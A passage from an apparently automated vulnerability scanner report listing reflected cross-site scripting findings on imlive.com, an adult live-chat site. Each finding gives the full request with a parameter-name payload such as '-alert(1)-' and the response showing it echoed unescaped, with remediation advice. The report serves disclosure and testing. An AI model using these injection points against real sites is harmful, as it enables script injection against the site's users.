<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/fetish/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:02 GMT Connection: close Content-Length: 24983 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:12 GMT Connection: close Content-Length: 73010 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video-for-ipod/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:19 GMT Connection: close Content-Length: 73157 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 52326 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/free-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 52111 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:49 GMT Connection: close Content-Length: 34182 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1"> ...[SNIP]...
2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/gay-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:59 GMT Connection: close Content-Length: 34366 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:00 GMT Connection: close Content-Length: 195797 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1"> ...[SNIP]...
2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/gay/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
